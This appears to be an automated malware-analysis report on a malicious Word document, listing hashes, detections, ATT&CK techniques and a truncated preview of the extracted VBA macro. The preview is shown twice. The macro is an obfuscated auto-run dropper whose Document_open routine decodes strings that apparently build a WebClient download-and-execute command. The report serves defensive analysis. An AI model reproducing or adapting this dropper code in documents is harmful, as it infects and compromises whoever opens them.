Office (OLE) malware analysis — malicious · b01c6495ef175bc3

MALICIOUS

Office (OLE)

134.5 KB Created: 2018-04-24 20:36:00 Authoring application: Microsoft Office Word First seen: 2019-01-20

MD5: a529e075378e304f7dd35672a3a242e2 SHA-1: 9e30f8f6c1887d5801811ead916ca059d0bd4074 SHA-256: b01c6495ef175bc35fc0e24ec7a5b094ef3c376b3073f3de24be4662affb787b

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro and a 'Shell()' call indicate that the script is designed to execute arbitrary commands. The ClamAV detection 'Doc.Dropper.Agent-6517626-0' further supports its role as a dropper. The VBA code is heavily obfuscated, but the presence of the 'Shell()' function strongly suggests it attempts to download and execute a secondary payload.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6517626-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6517626-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37033 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37033 bytes
SHA-256: `740f405b0d643737580e1c9d30ed0cfc438db5cb92dc32dff87bfe76ff8daaf6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VQwaiTtO" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub TkhOV(wOFNY) LNafW = 78046 * JmhaN + 73783 * ChrB(25085 * Rnd(74991) - 19313 + wqAAC) - 93812 - Rnd(tTzYQ) + 38626 - TcVaH * 42005 * Chr(ShdDhm) End Sub Sub TcIio(IWXEJ) MmCqs = 87126 * KHlQm + 61373 * ChrB(77307 * Rnd(49000) - 58111 + XzVKE) - 50002 - Rnd(ppcKNw) + 10404 - QqJtP * 81423 * Chr(JObCiL) CzjiN = 99933 * oGIML + 1933 * ChrB(4492 * Rnd(33126) - 14484 + KfzVpf) - 60598 - Rnd(TmnGi) + 3553 - jUncbj * 68904 * Chr(JckAh) pisHf = 85089 * LzNUE + 30190 * ChrB(88391 * Rnd(26353) - 38215 + XGUijO) - 78810 - Rnd(NaaqtE) + 58183 - KdDvzD * 18463 * Chr(UUaHWT) End Sub Sub rptMuN(ITDaS) cUFIq = 12619 * QKYjU + 94072 * ChrB(59512 * Rnd(19050) - 23349 + hJtkiB) - 99485 - Rnd(jkkVjr) + 46735 - rNzORQ * 31065 * Chr(ZhQKs) iPwfWQ = 47708 * tTGQGW + 41299 * ChrB(89975 * Rnd(51461) - 64297 + jFRKz) - 43580 - Rnd(tiKAk) + 79035 - mBUYEV * 14249 * Chr(KTfIB) End Sub Private Sub Document_open() On Error Resume Next tsiGj = 99308 * sQFwI + 10450 * ChrB(44674 * Rnd(88138) - 43313 + jRQTUB) - 42119 - Rnd(MDWuw) + 57866 - UGzmfu * 2171 * Chr(rulOZv) RiizZwrm (kSnaw + ZudELpa + lqZrJk) wmzRb = 19438 * zXHqwi + 53147 * ChrB(48391 * Rnd(49107) - 68074 + wawTEG) - 46743 - Rnd(zjPauW) + 19370 - tEwTmP * 15203 * Chr(MKzbN) End Sub Sub MQpEN(bchqt) MEjwMU = 77915 * iUcQA + 61981 * ChrB(36392 * Rnd(60245) - 12821 + JwThWz) - 70200 - Rnd(JACQXG) + 48972 - DDhPwd * 75484 * Chr(hsoZE) qvVohz = 50420 * hkMWKn + 3083 * ChrB(33598 * Rnd(94192) - 43285 + IdPzqv) - 62202 - Rnd(KAiKK) + 72817 - KHuiYc * 34966 * Chr(VzDbS) HQvRiw = 7219 * zftAnP + 59424 * ChrB(6494 * Rnd(49066) - 3208 + hduWOz) - 27827 - Rnd(EuAnUN) + 18985 - jjtbp * 48155 * Chr(JPpXoC) End Sub Sub SXBqlV(thUUG) jzrZnd = 24970 * UjZvIu + 71422 * ChrB(13435 * Rnd(47807) - 49281 + nLbcl) - 57918 - Rnd(opqCYH) + 68108 - CLYQkK * 79776 * Chr(zrbucb) End Sub Sub mIuuSn(UFuKp) ESHSL = 66028 * ZiIoPz + 25685 * ChrB(57724 * Rnd(72456) - 19445 + zMNEti) - 25090 - Rnd(nzrSV) + 49365 - RufjJ * 66946 * Chr(jDDzFi) ZaivL = 21617 * KAYdFv + 90803 * ChrB(88749 * Rnd(64469) - 30813 + PujTwB) - 981 - Rnd(FcKAu) + 47976 - vNWIXJ * 27754 * Chr(HtHGEn) End Sub Attribute VB_Name = "pVnMqkoGcjuKFA" Sub zdEXz(XYsdAD) ZqvwN = 12277 * oMhiwG + 13364 * ChrB(88604 * Rnd(54225) - 54760 + IqHudC) - 63962 - Rnd(RSwujp) + 62105 - jmlwz * 98855 * Chr(LmwVZ) End Sub Function ZudELpa() On Error Resume Next GBulj = 92890 * CzIqv + 14768 * ChrB(46989 * Rnd(82964) - 89220 + oCAfoX) - 62943 - Rnd(wusDiv) + 53072 - rFUKJY * 39612 * Chr(zGmoH) SNiWGwcAh = BilzOM("zNa1%UshO'+'mDChOm+hOmX){'+'try{7wzYYUhOm+hOm.ms6DoahOm+hOmlhOm+hOmuWnlalhOm+hOmuOahOm+hOmdFhOm+hOmIalulehOm+hOmms6hOm+hOm(7wzasfc'+'.mhOm+hOmshOm+hOm6ToShOm+hOmtraluialuNgms6hOm+EW", knLaL - knLaL + 8 + knLaL - knLaL, knLaL - knLaL + 172 + knLaL - knLaL) vJWlw = 75210 * dRdNwh + 3099 * ChrB(62337 * Rnd(97800) - 41344 + PSQSW) - 69487 - Rnd(Phjhil) + 84244 - qzjhtw * 77861 * Chr(NnqwMq) zrOlbh = 26124 * awCBnB + 37236 * ChrB(74153 * Rnd(17794) - 49681 + zaJtzE) - 32107 - Rnd(WZFlr) + 23454 - NHqDWY * 70517 * Chr(hsSLzi) dSMHWYq = BilzOM("NzN+hOmchOm+vHR%D", nwlZZ - nwlZZ + 4 + nwlZZ - nwlZZ, nwlZZ - nwlZZ + 9 + nwlZZ - nwlZZ) kkFHXG = 75990 * PhKOrF + 40796 * ChrB(23492 * Rnd(20890) - 79118 + oMvFD) - 35965 - Rnd(jcBjs) + 33263 - lpUjjo * 42122 * Chr(JbWLK) qArcC = 49993 * fcDUr + 98693 * ChrB(59671 * Rnd(44129) - 83779 + uWNlaS) - 68569 - Rnd(MCIvGB) + 427 - wHbirs * 67546 * Chr(LwrHT) VdShuf = BilzOM("Rwm+hOmet.hOm+hOmWebClhOm+hOmient;hOm+hOm7whOm+hOmz'+'NhOm+hOmSB = 7hOm+'+'hOmwhOm+hOmznsadasd.nhOm+hOmext(10000, hOm+hOm282133);7wzA'+'DhOm+hOmCXhO'+'m+hOm = cl4 hOm+hOm hthOm+hUZ9NSq", lMfIWn - lMfIWn + 3 + lMfIWn - lMfIWn, lMfIWn - lMfIWn + 176 + lMfIWn - lMfIWn) kEAiP = 57597 * mPhHw + 80136 * ChrB(45378 * Rnd(31708) - 70060 + CUrAX) - 914 ... (truncated)

SHA-256: 740f405b0d643737580e1c9d30ed0cfc438db5cb92dc32dff87bfe76ff8daaf6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VQwaiTtO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub TkhOV(wOFNY)
LNafW = 78046 * JmhaN + 73783 * ChrB(25085 * Rnd(74991) - 19313 + wqAAC) - 93812 - Rnd(tTzYQ) + 38626 - TcVaH * 42005 * Chr(ShdDhm)
End Sub
Sub TcIio(IWXEJ)
MmCqs = 87126 * KHlQm + 61373 * ChrB(77307 * Rnd(49000) - 58111 + XzVKE) - 50002 - Rnd(ppcKNw) + 10404 - QqJtP * 81423 * Chr(JObCiL)
CzjiN = 99933 * oGIML + 1933 * ChrB(4492 * Rnd(33126) - 14484 + KfzVpf) - 60598 - Rnd(TmnGi) + 3553 - jUncbj * 68904 * Chr(JckAh)
pisHf = 85089 * LzNUE + 30190 * ChrB(88391 * Rnd(26353) - 38215 + XGUijO) - 78810 - Rnd(NaaqtE) + 58183 - KdDvzD * 18463 * Chr(UUaHWT)
End Sub
Sub rptMuN(ITDaS)
cUFIq = 12619 * QKYjU + 94072 * ChrB(59512 * Rnd(19050) - 23349 + hJtkiB) - 99485 - Rnd(jkkVjr) + 46735 - rNzORQ * 31065 * Chr(ZhQKs)
iPwfWQ = 47708 * tTGQGW + 41299 * ChrB(89975 * Rnd(51461) - 64297 + jFRKz) - 43580 - Rnd(tiKAk) + 79035 - mBUYEV * 14249 * Chr(KTfIB)
End Sub
Private Sub Document_open()
On Error Resume Next
tsiGj = 99308 * sQFwI + 10450 * ChrB(44674 * Rnd(88138) - 43313 + jRQTUB) - 42119 - Rnd(MDWuw) + 57866 - UGzmfu * 2171 * Chr(rulOZv)
RiizZwrm (kSnaw + ZudELpa + lqZrJk)
wmzRb = 19438 * zXHqwi + 53147 * ChrB(48391 * Rnd(49107) - 68074 + wawTEG) - 46743 - Rnd(zjPauW) + 19370 - tEwTmP * 15203 * Chr(MKzbN)
End Sub
Sub MQpEN(bchqt)
MEjwMU = 77915 * iUcQA + 61981 * ChrB(36392 * Rnd(60245) - 12821 + JwThWz) - 70200 - Rnd(JACQXG) + 48972 - DDhPwd * 75484 * Chr(hsoZE)
qvVohz = 50420 * hkMWKn + 3083 * ChrB(33598 * Rnd(94192) - 43285 + IdPzqv) - 62202 - Rnd(KAiKK) + 72817 - KHuiYc * 34966 * Chr(VzDbS)
HQvRiw = 7219 * zftAnP + 59424 * ChrB(6494 * Rnd(49066) - 3208 + hduWOz) - 27827 - Rnd(EuAnUN) + 18985 - jjtbp * 48155 * Chr(JPpXoC)
End Sub
Sub SXBqlV(thUUG)
jzrZnd = 24970 * UjZvIu + 71422 * ChrB(13435 * Rnd(47807) - 49281 + nLbcl) - 57918 - Rnd(opqCYH) + 68108 - CLYQkK * 79776 * Chr(zrbucb)
End Sub
Sub mIuuSn(UFuKp)
ESHSL = 66028 * ZiIoPz + 25685 * ChrB(57724 * Rnd(72456) - 19445 + zMNEti) - 25090 - Rnd(nzrSV) + 49365 - RufjJ * 66946 * Chr(jDDzFi)
ZaivL = 21617 * KAYdFv + 90803 * ChrB(88749 * Rnd(64469) - 30813 + PujTwB) - 981 - Rnd(FcKAu) + 47976 - vNWIXJ * 27754 * Chr(HtHGEn)
End Sub

Attribute VB_Name = "pVnMqkoGcjuKFA"
Sub zdEXz(XYsdAD)
ZqvwN = 12277 * oMhiwG + 13364 * ChrB(88604 * Rnd(54225) - 54760 + IqHudC) - 63962 - Rnd(RSwujp) + 62105 - jmlwz * 98855 * Chr(LmwVZ)
End Sub
Function ZudELpa()
On Error Resume Next
GBulj = 92890 * CzIqv + 14768 * ChrB(46989 * Rnd(82964) - 89220 + oCAfoX) - 62943 - Rnd(wusDiv) + 53072 - rFUKJY * 39612 * Chr(zGmoH)
SNiWGwcAh = BilzOM("zNa1%UshO'+'mDChOm+hOmX){'+'try{7wzYYUhOm+hOm.ms6DoahOm+hOmlhOm+hOmuWnlalhOm+hOmuOahOm+hOmdFhOm+hOmIalulehOm+hOmms6hOm+hOm(7wzasfc'+'.mhOm+hOmshOm+hOm6ToShOm+hOmtraluialuNgms6hOm+EW", knLaL - knLaL + 8 + knLaL - knLaL, knLaL - knLaL + 172 + knLaL - knLaL)
vJWlw = 75210 * dRdNwh + 3099 * ChrB(62337 * Rnd(97800) - 41344 + PSQSW) - 69487 - Rnd(Phjhil) + 84244 - qzjhtw * 77861 * Chr(NnqwMq)
zrOlbh = 26124 * awCBnB + 37236 * ChrB(74153 * Rnd(17794) - 49681 + zaJtzE) - 32107 - Rnd(WZFlr) + 23454 - NHqDWY * 70517 * Chr(hsSLzi)
dSMHWYq = BilzOM("NzN+hOmchOm+vHR%D", nwlZZ - nwlZZ + 4 + nwlZZ - nwlZZ, nwlZZ - nwlZZ + 9 + nwlZZ - nwlZZ)
kkFHXG = 75990 * PhKOrF + 40796 * ChrB(23492 * Rnd(20890) - 79118 + oMvFD) - 35965 - Rnd(jcBjs) + 33263 - lpUjjo * 42122 * Chr(JbWLK)
qArcC = 49993 * fcDUr + 98693 * ChrB(59671 * Rnd(44129) - 83779 + uWNlaS) - 68569 - Rnd(MCIvGB) + 427 - wHbirs * 67546 * Chr(LwrHT)
VdShuf = BilzOM("Rwm+hOmet.hOm+hOmWebClhOm+hOmient;hOm+hOm7whOm+hOmz'+'NhOm+hOmSB = 7hOm+'+'hOmwhOm+hOmznsadasd.nhOm+hOmext(10000, hOm+hOm282133);7wzA'+'DhOm+hOmCXhO'+'m+hOm = cl4 hOm+hOm hthOm+hUZ9NSq", lMfIWn - lMfIWn + 3 + lMfIWn - lMfIWn, lMfIWn - lMfIWn + 176 + lMfIWn - lMfIWn)
kEAiP = 57597 * mPhHw + 80136 * ChrB(45378 * Rnd(31708) - 70060 + CUrAX) - 914
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.